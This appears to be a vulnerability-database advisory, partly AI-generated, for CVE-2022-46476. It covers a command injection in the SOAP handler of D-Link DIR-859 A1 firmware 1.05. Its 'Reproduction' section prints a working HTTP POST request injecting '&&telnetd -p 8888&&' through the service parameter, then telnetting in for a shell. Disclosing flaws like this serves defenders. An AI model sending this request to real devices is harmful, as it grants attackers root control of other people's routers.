CVE-2022-46476
Description
D-Link DIR-859 A1 1.05 was discovered to contain a command injection vulnerability via the service= variable in the soapcgi_main function.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
D-Link DIR-859 A1 firmware 1.05 has a command injection vulnerability in soapcgi_main via the service parameter, allowing unauthenticated remote attackers to execute arbitrary commands.
Vulnerability
The command injection vulnerability resides in the soapcgi_main function of the cgibin program in D-Link DIR-859 A1 firmware version 1.05. The service parameter from the request URI is extracted, filtered, and then passed to system() without proper sanitization, allowing injection of arbitrary commands [1].
Exploitation
An unauthenticated attacker can send a crafted HTTP POST request to the /soap.cgi endpoint with a service parameter containing command injection payloads. The reference POC demonstrates injecting &&telnetd -p 8888&& to start a telnet service on port 8888, then connecting to it remotely [1].
Impact
Successful exploitation allows an attacker to execute arbitrary commands with root privileges on the device, leading to full compromise of the router, including data exfiltration, network monitoring, and use as a pivot point [1].
Mitigation
As of the publication date, no official patch has been released by D-Link. Users should consider upgrading to a newer firmware version if available or replacing the device if it reaches end-of-life. The vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities catalog.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient filtering of the `service=` parameter in `soapcgi_main` allows shell metacharacters to reach `system()`."
Attack vector
An attacker sends a crafted HTTP POST request to `/soap.cgi` with a `service=` query parameter containing shell metacharacters. The PoC shows injecting `&&telnetd -p 8888&&` into the `service` value, which bypasses the weak filter and causes `system()` to execute the injected command [ref_id=1]. The request must be sent to port 49152 on the router (typically the LAN-side web interface) [ref_id=1].
Affected code
The vulnerability resides in the `soapcgi_main` function of the `cgibin` program. The `service=` parameter value from the `request_uri` environment variable is extracted into variable `v11`, which is filtered insufficiently before being formatted into `byte_434EF0` and passed to `system()` [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory [ref_id=1] identifies that the filtering applied to the `service=` parameter value (`v11`) is insufficient, allowing shell metacharacters like `&&` to pass through to `system()`. A proper fix would require either sanitizing or rejecting shell metacharacters in the `service` parameter, or avoiding the use of `system()` with user-controlled input entirely.
Preconditions
- networkAttacker must have network access to the router's LAN interface on port 49152
- configThe router must be running D-Link DIR-859 A1 firmware version 1.05
Reproduction
Send the following HTTP POST request to the router at `192.168.0.1:49152`:
``` POST /soap.cgi?service=&&telnetd -p 8888&& HTTP/1.1 Host: localhost:49152 Content-Type: text/xml Content-Length: 88 SOAPAction: a#b
```
After sending, connect via telnet to `192.168.0.1` on port `8888` to obtain a shell [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.